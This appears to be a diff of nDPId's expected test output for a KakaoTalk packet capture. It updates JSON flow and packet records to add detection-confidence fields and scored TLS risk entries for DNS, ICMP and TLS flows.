 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="}
@@ -71,29 +71,29 @@
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"}
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBHSGwoYUrwKvAEB7lMANQAt50i5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069030083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":81,"pkt_l4_len":45,"ts_msec":1430069030083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEEAAEAAQBEUGwoYUrwKvL8B7lMANQAtKUi5OgEAAAEAAAAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQAB"}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030083,"flow_last_seen":1430069030083,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1430069030083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1430069030115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":119,"pkt_l4_len":83,"ts_msec":1430069030115,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGccBgAANREA8Aq8AQEKGFK8ADXuUwBTwyO5OoGAAAEAAgAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAAHYwAKBHBsdXMCZ2zAFsAxAAEAAQAAAQkABNJn8A8="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069030115,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":55,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069030115,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069030119,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":119,"pkt_l4_len":83,"ts_msec":1430069030119,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGf90QAANRFhIwq8vwEKGFK8ADXuUwBTEye5OoGAAAEAAgAAAAAJcGx1cy10YWxrBWtha2FvA2NvbQAAAQABwAwABQABAAADlQAKBHBsdXMCZ2zAFsAxAAEAAQAAAMkABNJn8A8="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"plus-talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"210.103.240.15"}}
 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","flow_datalink":113,"flow_max_packets":3}
 00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069030119,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":147,"pkt_l4_len":111,"ts_msec":1430069030119,"pkt":"AAQCEgAAAAAAAAAAAAAIAEXAAIMZuAAAQAE5cQoYUrwKvL8BAwMj8wAAAABFAABn\/dEAADURYSMKvL8BChhSvAA17lMAUxMnuTqBgAABAAIAAAAACXBsdXMtdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAAA5UACgRwbHVzAmdswBbAMQABAAEAAADJAATSZ\/AP"}
-00604{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030119,"flow_last_seen":1430069030119,"flow_idle_time":120000,"flow_min_l4_payload_len":111,"flow_max_l4_payload_len":111,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1430069030119,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.755603}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030121,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069030121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1430069030121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069030121,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwrfUAAPwbw8woYUrzSZ\/APk70Bu6\/qIaMAAAAAoAI5CH35AAACBAV4BAIICgALCt4AAAAAAQMDBw=="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1430069030159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1430069030159,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwUQ0AA+AZPPdJn8A8KGFK8AbuTvWC6rQuv6iGkYBIRHPMdAAACBAV4"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1430069030162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1430069030162,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgrfkAAPwbxBgoYUrzSZ\/APk70Bu6\/qIaRguq0MUBA5COKyAAA="}
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
-01155{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}}
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030121,"flow_last_seen":1430069030171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1430069030171,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01085{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069030121,"flow_last_seen":1430069030296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1496,"flow_avg_l4_payload_len":213,"midstream":0,"ts_msec":1430069030296,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}}
+01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069030121,"flow_last_seen":1430069030336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3736,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1430069030336,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":37821,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.kakao.com","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"4192c0a946c5bd9b544b4656d9f624a4","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Thawte, Inc., CN=Thawte SSL CA","subjectDN":"C=KR, ST=Gyeonggi-do, L=Seongnam-si, O=Kakao Corp., CN=*.kakao.com","fingerprint":"0D:14:6D:8D:5E:EB:F5:F5:42:87:CD:AB:AE:A1:DC:AA:5A:76:6F:E4"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
